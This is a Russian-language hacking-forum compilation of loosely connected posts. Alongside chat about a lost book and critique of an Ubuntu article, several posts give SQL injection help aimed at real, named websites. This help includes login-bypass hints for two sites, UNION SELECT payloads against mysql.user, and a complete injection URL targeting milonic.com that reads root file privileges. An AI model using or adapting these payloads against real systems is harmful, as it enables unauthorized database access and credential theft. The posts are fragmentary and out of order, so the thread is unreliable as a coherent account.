филдз енклозед бай и тому подобные конструкции

[QUOTE=scipio;122743]потому что в свойствах «55 колонки» указано что она может принимать значение NULL, а способ работает только для тех колонок свойства которых имеют атрибут NOT NULL[/QUOTE]
Это всё понятно, но в тех колонках просто по логике вещей не должно быть NULL! Т.е. магическим образом вывода нет только в тех колонках шопа которые представляют реально вкусную информацию!

Рад за тебя :)

А знаешь прошло много времени с того момента как наебнулась моя книга и я тебе могу сказать я не сколько сейчас не жалею что она канула в лету, хотя как щас помню как я тогда переживал и считал потерей, может быть твоему расскажу не сдьба быть опбликованным? может так и лучше… хз кароч))) вобщем со временем все переосмысливаешь и понимаешь что всё к лучшему :)

Эхх, как я понимаю тебя, тоже как то давно удалил уже готовую написанную книгу, так же решил переустановить систему, а файлик на РС забыл вордовсий исходник и пдф конвертнутый уже, тогда мне ничего к сожалению из многих тулз не помогло, главное не затереть те данные новыми и тогда возможность будет :)

[QUOTE=ner;122541]А как совместить XSS с PHP INCLUD?[/QUOTE]

Угу :|

Ну давай для наглядности рассмотри такую простенькую ситуацию:
[CODE]mysql> select user from dvwa.users order by 1;
+---------+
| user |
+---------+
| 1337 |
| admin |
| gordonb |
| pablo |
| smithy |
+---------+
5 rows in set (0.03 sec)

mysql> select user from dvwa.users order by 1 union select 1;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY[/CODE]
Дальше думай головой :)

Я всегда знал, что ты псих :) но статью прочитал с удовольствием :) В итоге чем хамач не устраивает?

Он типо себе её присвоил, а ты спалил его ))) а всё понял тс микроб :)

Проверить никак?!

Ни у кого нет предположений? :(

[QUOTE=scipio;108543]при инъекции в 4-й ветке mysql мы можем узнать имена колонок если есть вывод сообщений об ошибках mysql.[/QUOTE]

Вопрос на засыпку) почему может не выводиться имя колонки? т.е. к примеру я вывожу имя 54 колонки в ошибку при 55 ошибки вовсе не возникает(((

[QUOTE=kazin8;121090]ребят. кто помочь сможет… есть некая кмска. [url]http://fonema.ru/login.html[/url]
[url]http://www.cat5e.ru/login.html[/url]
у нее на Post Sql — injection какая то реакция не хорошая… вроде бы она и есть… но в то же время ее нет… помогите пожалуйста сформировать боевой запрос. заранее спасибо)[/QUOTE]

Ну, в общем-то инжект в поле ввода пароля, суть тут в том, чтобы обойти авторизацию нам надо по логике вещей или знать как минимум логин аминистратора или схитрить путём экранирования кавычки в поле логина и соответственно продолжением логики запроса в поле пароля, это подсказка дальше сам шевели мозгами :)

[QUOTE=laedafess;121111]ну поставь пробелы, вместо плюсов
или коменты поменяй на /* или %23
ну и фром убери, у тебя может не быть доступа к mysql.user
можно еще как-нить так извратица

4548'+union+select+version()+from+lolo+where+'a'='a

если коменты не пашут[/QUOTE]
Да пробовал я и коменты разные и на пробелы заменять и на недокументированные эквиваленты и без фром пробовал и с форм и как только не пробовал ничего не проходит к сожалению (((

Да пробовал я так, по логике вещей запрос так и должен выглядеть, но не катит почему то, в БД приходит в таком виде:
[QUOTE]
SELECT blabla FROM lolo WHERE lolo_xmm LIKE '%4548'+union+select+version()+from+mysql.user+--%' AND ( (chto_to_esho LIKE '|||%') || (chto_to_esho LIKE '%||||||%') ) LIMIT 1[/QUOTE]
Много чего перепробовал, как мне кажется суть проблемы тут в пробельных символах.

Такой вот вопрос у меня возник, кто-нибудь в курсе как крутятся инъекции, если основной запрос примерно такой:
[QUOTE]$sql=«SELECT blabla FROM lolo WHERE lolo_xmm LIKE '%».$_GET['params']."%' AND ( (chto_to_esho LIKE '|||%') || (chto_to_esho LIKE '%||||||%') ) LIMIT 1[/QUOTE]

[QUOTE=sanekdark;120841]новичек а рвешься уже в модераторы.ммм
а ты не поторопился?......[/QUOTE]

Быть может тебе не стоит брать на себя функции администратора? Новичок на форуме и новичок по сути есть разные вещи, ну ты меня думаю понял.

Консолью :)

Познавательно, спс :)

Ник: FastFlood
Раздел: Социальная Инженерия

[QUOTE=XSheffX;120459]Насчёт того зачем открывать файлы в терминале, на мой взгляд знать что это возможно сделать и уметь это делать лишним не будет.(Правда процесс открытия не описывал)[/QUOTE]
Ну вот видишь, сам говоришь, описал не полностью, более того не объясняя все аспекты и недостатки данного метода, а про алтернативный метод ты упомянул? :)

[QUOTE=XSheffX;120459]Что до того, сделал ли я выводы только исходя из Убунты...[/QUOTE]
Это называется необъективность, вот я о чём, т.е. выводы о всех дистрах линуха делать по одной убунте не стоит ;) как было уже сказано, убунту всё-таки как ни как юзерфрэндли…

[QUOTE=phpdreamer;120464]
Автор молодец, что интересуется этой темой и даже написал пару советов для только поставивших эту систему. Но [B]это слишком малая доля[/B] того что можно сделать чтобы это считалось статьей с таким заголовком.
Можно было написать про Compiz, про плагины для наутилуса и Gedit, аплеты гнома, несколько десятков дополнительных репозиториев, дополнительные пакеты для wine, шрифты, проги для очистки системы и резервного копирования данных, изменение настроек grub… и тд[/QUOTE]
Полностью согласен :)

[QUOTE=XSheffX;120479]To phpdreamer.Понял. По-возможности постараюсь дополнить статью.( Или, если что, изменить название.)[/QUOTE]
Нет ты уж если начал лучше доведи дело до победного :) название нам нравится, главное наполни статью оригинальным контентом соответствующим названию :)

[url]http://www.milonic.com/list/index.php?go=search&action;=se&search;=547865656566568697987')+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+where+user=0x726f6f74+--+[/url]

Ууу, да вы сенсей похоже сами недавно только установили себе линукс проштудировав убунтологию :) Хочешь критику?! Ну лан поехали :) Зачем открывать файлы через консоль? ведь это вызовет некоторые неудобства по понятным причинам! «Как Вы видите, Линукс не такая страшная Ось, как её малюют» — и это ты на основе одной убунты сделал такие выводы?) Убунту сплошной юзерфрендли. Вот в каждой статье вижу одни и те же слова, «вот это я описывать не буду так как информации в инете на эту тему выше крыши и якобы не имеет смысла так как и так там все ясно» — тогда скажи какой смысл вообще в таких статьях? так как все что ты описал в данной статье присутствует в интеренете в избытке? Написать для того чтобы было? Ну да ладно :) статья хорошая, одобряю :)

Е****ы однако

Ломать не строить, мда :(